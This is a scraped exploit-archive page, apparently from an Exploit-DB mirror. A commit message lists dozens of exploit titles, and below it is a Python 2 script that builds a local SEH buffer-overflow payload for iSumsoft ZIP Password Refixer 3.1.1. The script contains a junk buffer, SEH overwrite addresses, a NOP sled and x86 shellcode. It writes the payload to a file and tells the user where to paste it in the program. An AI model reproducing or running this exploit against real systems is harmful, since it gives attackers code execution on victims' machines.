5947825a84
15 changes to exploits/shellcodes uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) μTorrent (uTorrent) 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) uTorrent WebUI 0.370 - Authorisation Header Denial of Service μTorrent (uTorrent) WebUI 0.370 - Authorisation Header Denial of Service Memcached - 'memcrashed' Denial of Service Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (2) Memcached 1.5.5 - 'Memcrashed' Insufficient Control Network Message Volume Denial of Service (1) Memcached 1.5.5 - 'Memcrashed ' Insufficient Control of Network Message Volume Denial of Service With Shodan API Broadcom BCM43xx Wi-Fi - 'BroadPWN' Denial of Service WebLog Expert Enterprise 9.4 - Denial of Service uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking uTorrent 2.0.3 - DLL Hijacking μTorrent (uTorrent) 2.0.3 - DLL Hijacking iSumsoft ZIP Password Refixer 3.1.1 - Buffer Overflow Microsoft Office - 'Composite Moniker Remote Code Execution Mozilla Firefox - Address Bar Spoofing Tor (Firefox 41 < 50) - Code Execution Chrome 35.0.1916.153 - Sandbox Escape / Command Execution WebLog Expert Enterprise 9.4 - Authentication Bypass uTorrent 1.6 build 474 - 'announce' Key Remote Heap Overflow μTorrent (uTorrent) 1.6 build 474 - 'announce' Key Remote Heap Overflow t. hauck jana WebServer 1.0/1.45/1.46 - Directory Traversal T. Hauck Jana Server 1.0/1.45/1.46 - Directory Traversal Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution Werkzeug - 'Debug Shell' Command Execution TikiWiki < 1.9.9 - 'tiki-listmovies.php' Directory Traversal TikiWiki Project < 1.9.9 - 'tiki-listmovies.php' Directory Traversal toronja CMS - SQL Injection Toronja CMS - SQL Injection uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery μTorrent (uTorrent) WebUI 0.310 Beta 2 - Cross-Site Request Forgery tinybrowser - 'tinybrowser.php' Directory Listing tinybrowser - 'edit.php' Directory Listing TinyBrowser - 'tinybrowser.php' Directory Listing TinyBrowser - 'edit.php' Directory Listing Xoops 2.5.7.2 - Directory Traversal Bypass XOOPS 2.5.7.2 - Directory Traversal Bypass SAP BusinessObjects launch pad - Server-Side Request Forgery antMan < 0.9.1a - Authentication Bypass Bacula-Web < 8.0.0-rc2 - SQL Injection
51 lines
No EOL
1.6 KiB
Python
Executable file
51 lines
No EOL
1.6 KiB
Python
Executable file
author = '''
|
|
|
|
##############################################
|
|
# Created: ScrR1pTK1dd13 #
|
|
# Name: Greg Priest #
|
|
# Mail: ScR1pTK1dd13.slammer@gmail.com #
|
|
##############################################
|
|
|
|
# Exploit Title:iSumsoft Local Buffer Overflow Vuln. 0day(SEH)
|
|
# Date: 2018.03.02
|
|
# Exploit Author: Greg Priest
|
|
# Version: iSumsoft ZIP Password Refixer Version 3.1.1
|
|
# Tested on: Windows7 x64 HUN/ENG Professional
|
|
'''
|
|
|
|
junk = "A" * 340
|
|
nSEH = "\xeb\x06\x90\x90"
|
|
SEH = "\x0C\x70\x8D\x73"
|
|
nop = "\x90" *16
|
|
|
|
shellcode =(
|
|
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" + #cmd.exe shellcode!
|
|
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
|
|
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
|
|
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
|
|
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
|
|
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
|
|
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
|
|
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
|
|
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
|
|
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
|
|
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
|
|
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
|
|
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
|
|
"\x53\x53\x53\x53\x52\x53\xff\xd7")
|
|
|
|
crash = junk + nSEH + SEH + nop + shellcode + "C" * 300
|
|
|
|
exploit = open('iSumsoft-exploit.txt', 'w')
|
|
exploit.write(crash)
|
|
exploit.close()
|
|
|
|
print author
|
|
print '''
|
|
#####################
|
|
#This is a PoC code!#
|
|
#####################
|
|
|
|
'''
|
|
print "[+] iSumsoft-exploit.txt ready!"
|
|
print '[+] Copy iSumsoft-exploit.txt string and paste "start from:" field!' |